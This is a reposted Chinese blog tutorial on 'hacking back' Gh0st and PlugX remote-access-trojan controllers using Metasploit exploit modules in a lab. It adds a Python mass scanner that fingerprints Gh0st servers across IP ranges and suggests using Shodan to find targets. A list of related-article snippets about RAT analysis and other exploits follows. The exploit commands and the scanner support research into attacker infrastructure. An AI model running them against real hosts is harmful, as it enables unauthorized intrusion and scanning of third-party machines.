HackingBackRATs

最新推荐文章于 2024-08-08 14:28:23 发布
最新推荐文章于 2024-08-08 14:28:23 发布
阅读量159 收藏
点赞数
文章标签: python 测试
原文链接:http://www.cnblogs.com/-bi-/p/7490440.html
版权

Hacking back RATs

作者:Hiina@NiXiTeam

在 blackhat2017,@professor__plum 爆料了几款常见远控(Xtreme、PlugX、Gh0st)的远程溢出。随后 msf 也更新了 EXP,并给出了测试用例。

模拟测试

Gh0st

首先测试 gh0st,这款远控比较久远了,大家应该很熟悉了。

运行 gh0st,得知默认监听端口为80,测试机地址10.211.55.3:

gh0st1

从github下载利用脚本,放到msf的目录里面,我们就可以开始测试了。

gh0st2

脚本默认监听端口是80,我们只需要设置一下RHOST就能执行执行:

use exploit/windows/misc/gh0st
set RHOST 10.211.55.3
exploit

gh0st3

可以看到已经返回了一个session,gh0st溢出测试成功。

PlugX

PlugX 默认监听端口为13579:

plugx1

执行命令:

use exploit/windows/misc/plugx
set RHOST 10.211.5.3
set target 1
check

plugx2

可以清楚的看到目标存在漏洞。
接着执行exploit:

plugx3

session会话创建,测试成功。

批量检测

Gh0st

以gh0st为例,通过Fuzz测试分析流量,发现当发送数据为任意十四个字符时,gh0st服务端返回五位特定字符,原版为「Gh0st」。以之作为检测条件,写脚本如下:

#__*__ coding:utf-8 __*__
import socket
import sys
import IPy
import gevent
from gevent import monkey
monkey.patch_all()
from gevent.pool import Pool

def gh0st(ip, port=80):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((ip, int(port)))
        data = 'a' * 14
        s.send(data)
        result = s.recv(10)
        if result:
            if len(result) == 5:
                print 'find str: '+result+' at '+ip+':'+str(port)
        s.close()
    except:pass
    # except Exception as e:
        # raise e

def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] <<24 | ip[1]<<16 | ip[2]<<8 |ip[3]

def num2ip(num):
    return '%s.%s.%s.%s' %( (num & 0xff000000) >>24,
                            (num & 0x00ff0000) >>16,
                            (num & 0x0000ff00) >>8,
                            num & 0x000000ff )
def get_ip(ip):
    start,end = [ip2num(x) for x in ip.split('-') ]
    return [ num2ip(num) for num in range(start,end+1) if num & 0xff ]

ipQueue = []
def iplist2queue():
    for x in iplist:
        ipQueue.append(str(x))

def run():
    p = Pool(100)
    while len(ipQueue)>0:
        p.spawn(gh0st, ipQueue.pop(), port)
    p.join()

if __name__ == '__main__':
    print '\r'
    if len(sys.argv) < 3:
            print 'Usage:\t'+sys.argv[0]+' ip port'
            sys.exit()
    ip = sys.argv[1]
    port = sys.argv[2]
    if ip.find('-')>=0:
        iplist = get_ip(ip)
        iplist2queue()
    elif ip.find('/')>=0:
        ip = ip.split("/")
        iplist = IPy.IP(ip[0]).make_net('255.255.255.0')
        iplist2queue()
    else:
        ipQueue.append(ip)
    try:
        run()
    except:pass

通过shadon筛选目标,以提高命中率。

*检测结果过于敏感,匿。

参考

  1. Stack overflow in PlugX RAT
  2. Digital Vengeance Exploiting the Most Notorious C&C Toolkits

转载于:https://www.cnblogs.com/-bi-/p/7490440.html

weixin_30823833
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PlugX变体已经悄悄更改源代码且正式更名为THOR
HBohan的博客
08-23 752
在2021年3月监测Microsoft Exchange Server攻击时,Unit 42研究人员就发现了一个PlugX变体,该变体是作为漏洞利用后远程访问工具 (RAT) 传送到其中一台受感染服务器的。 Unit 42 观察到该变体的独特之处在于它包含对其核心源代码进行了更改:将 “PLUG”替换为“THOR”。最早发现的 THOR 样本是 2019 年 8 月,它是已知最早的更名代码后的样本。在此变体中观察到了新功能,包括增强的有效载荷传送机制和滥用受信任的二进制文件。 PlugX 于 2008 年首
利用Gh0st 3.6远程溢出漏洞反向控制攻击者
K8哥哥
01-12 925
title: 利用Gh0st 3.6远程溢出漏洞反向控制攻击者 comments: true toc: true categories: [Metasploit] [Exp] tags: Metasploit Overflow Gh0st date: 2020-01-12 18:30:10 abbrlink: 30568 前言 漏洞验证在2017年被公开,实际上Gh0st溢出漏洞在2009...
利用云笔记平台投递远控木马的攻击活动分析
xxwn200301的博客
08-10 180
近期,安天CERT监测到一起利用云笔记平台投递远控木马的攻击活动。攻击者将远控木马相关载荷文件托管于某云笔记平台中,借助可信站点规避安全产品在流量侧的检测,并且持续更新其中的文件。本次攻击活动于2022年开始进行,攻击者将伪装成应用程序的诱饵文件投放至下载站,或者利用钓鱼邮件发送伪装成文档的诱饵文件,以此引诱用户下载执行。诱饵文件执行后采用“DDR”(DeadDrop。
APT样本分析 -plugx家族RAT⽊⻢
人饭子的博客
11-06 955
APT样本分析 - plugx家族RAT⽊⻢ ⼀、样本概述 样 本 从 海 莲 花 服 务 器 扒 下 来 的 ( 经 提 醒 修 改 , 原 先 错 误 归 类 为 海 莲 花 ) , wsc_proxy.exe执⾏后加载wsc.dll解密wsc.dump⽂件,得到攻击模块(dll),攻击模块注⼊⾃身到系统进程后连接远控服务器上线,接收执⾏远控功能。远控功能包括:管 理系统、⽂件、屏幕、进程、...
一例plugx样本的分析(AcroRd32cWP)
好好学习,天天向上
11-14 579
这个plugx样本是一个典型摆渡型窃密木马,使用分离免杀和白加黑侧加载的方式来躲避检测。解密后的payload是一个反射型的dll,有点像CS的beacon。样本中的api地址都是使用LoadLibrary和GetProcAddress来获取,给静态分析带来很大的工作量。通过U盘进行传播,远控模块比较复杂,目前C2地址已经失效了,但是对于隔离网用户来说,还是有一定的失泄密隐患。
【网络安全】PlugX变体已经悄悄更改源代码且正式更名为THOR
baidu_41678158的博客
01-03 261
在2021年3月监测Microsoft Exchange Server攻击时,Unit 42研究人员就发现了一个PlugX变体,该变体是作为漏洞利用后远程访问工具 (RAT) 传送到其中一台受感染服务器的。 Unit 42 观察到该变体的独特之处在于它包含对其核心源代码进行了更改:将 “PLUG”替换为“THOR”。最早发现的 THOR 样本是 2019 年 8 月,它是已知最早的更名代码后的样本。在此变体中观察到了新功能,包括增强的有效载荷传送机制和滥用受信任的二进制文件。PlugX 于 2008 年首次
Hacking Vim
11-30
Kim Schulz has an M.Sc. in Software Engineering from Aalborg University in Denmark. He has been an active developer in the Linux and Open Source communities since 1997 and has worked with everything ...
Hacking Basic Secuity
11-30
The Basics of Hacking and Penetration Testing, Second Edition, serves as an introduction to the steps required to complete a penetration test or perform an ethical hack from beginning to end....
Google Hacking语法.md
08-11
自己整理的一些关于Google Hacking语法相关知识,希望对你有所帮助
Google Hacking技术手册
08-11
《GoogleHacking技术手册》采纳了详尽的Google语法与工具。在发挥Google的最大搜索效用后,你又将如何反其道,让自己的信息无法被别人搜索到呢?只要你细细品读书中的讲解,顺着作者的逆向思维提示,便可轻松地找到...
Asterisk Hacking 无水印pdf
09-24
Asterisk Hacking 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
MS15-051 修正版Exploit(Webshell可用)
weixin_30734435的博客
01-23 103
MS15-051简介:Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 ...
plugin的认识与使用
她还会来吗的博客
03-18 3012
认识plugin plugin是插件的意思,通常是用与对某个现有的架构进行扩展。 webpack中的插件,就是对webpack现有功能的各种扩展,比如打包优化,文件压缩等等。 loader和plugin的区别 loader主要用于转换某些类型的模块,他是一个转换器 plugin是插件,它是对webpack本身的扩展,是一个扩展器 plugin的使用过程 步骤一:通过npm 安装需要使用的plugins 步骤二:在webpack.config.js中的plugins中配置插件 在webpack.config.
ms14_064漏洞别IE打开链接执行远控木马
sky
06-18 1666
ms14_064漏洞别IE打开链接执行远控木马 漏洞危及版本:win7/ xp 原文地址:http://wobushi.cn/  本人是将视频教程转换成了文字教程 1生成远控小马详见“ngrok配合msf生成木马” 2.将木马上传至hsf文件服务器复制链接 3.打开metasploit root@kali:~#msfconsole msf> useexploit/wi
C++Buffer缓冲区-Gh0st远程控制源码摘取
Syee001的专栏
07-27 922
/**Gh0st远程控制源码摘取 翻译修改***///缓冲器类 class Buffer { public: Buffer(void); virtual ~Buffer(void); /*函数说明: 功能 : 清空缓冲区 参数 : 返回值: 时间 :2014/01/26*/ void ClearBuffer(); /*函数说明: 功能 : 删除缓
ghostscript 远程命令执行漏洞复现
andiao1218的博客
08-23 532
影响的版本 <= 9.23(全版本、全平台) Ubuntu 开启 ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null 依次输入 legal { null restore } stopped { pop } if legal mark /O...
Gh0st控制端远程堆溢出
oceanark的博客
07-13 763
发布时间:2009-5-18 更新时间:2009-5-18 严重程度:高 威胁程度:控制远程主机 错误类型:边界检查错误 利用方式:主机模式 受影响系统 Gh0st3.6之前所有版本 Gh0st 发现漏洞,这些漏洞可以被用户利用,可以从被控端向控制端发送恶意代码,达到控制主控端的主机。 1)gh0st3.6\gh0st\FileManagerDlg.cpp中
大模型微调工具-torchtune
最新发布
weixin_40777649的博客
08-08 896
1.定义2.安装3. 案例。
深入探索:Google Hacking与网络安全
"Google Hacking" Google Hacking是一种技术,它利用Google搜索引擎来发现公开但可能未被注意到的敏感信息,这些信息通常与网络安全和数据保护有关。这种技术是由黑客和安全专家用来测试网络防御、识别漏洞以及获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值